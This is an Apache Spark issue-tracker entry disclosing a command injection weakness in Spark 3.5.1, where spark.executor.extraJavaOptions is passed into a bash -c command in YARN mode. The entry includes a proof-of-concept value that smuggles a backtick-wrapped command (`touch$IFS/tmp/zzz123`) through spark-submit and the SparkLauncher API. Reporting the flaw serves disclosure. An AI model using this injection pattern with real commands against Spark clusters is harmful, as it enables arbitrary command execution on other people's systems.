Uploaded image for project: 'Spark'
  1. Spark
  2. SPARK-50240

Command Execution Vulnerability in Spark (JavaOptions)

    XMLWordPrintableJSON

Details

    • Bug
    • Status: Open
    • Critical
    • Resolution: Unresolved
    • 3.5.1
    • None
    • Spark Submit
    • None

    Description

      We found that Spark allow user to upload jar packet with`extraJavaOptions` ,

       

      When instantiating a JAR package, use the javaOption configuration construct to execute the command if you configure the advanced optional parameters:

      spark.executor.extraJavaOption:

      \'touch\$IFS/tmp/zzz123|'

      The instance executes the jar package, uses the Yarn mode, and injects 'touch /tmp/zzz123' into the bash -c execution command.

      Command as:

      spark-submit --class JavaWordCount --master yarn --deploy-mode client --conf spark.executor.extraJavaOptions="\`touch\$IFS/tmp/zzz123\`" test.jar

      for java:

      sparkLauncher.setConf("spark.executor.extraJavaOptions", "`touch$IFS/tmp/zzz123`");

      Spark execution location:

      /yarn/src/main/scala/org/apache/spark/deploy/yarn/ExecutorRunnable.scala

       

      Attachments

        Activity

          People

            Unassigned Unassigned
            mistletoe Xiaotong
            Votes:
            0 Vote for this issue
            Watchers:
            1 Start watching this issue

            Dates

              Created:
              Updated: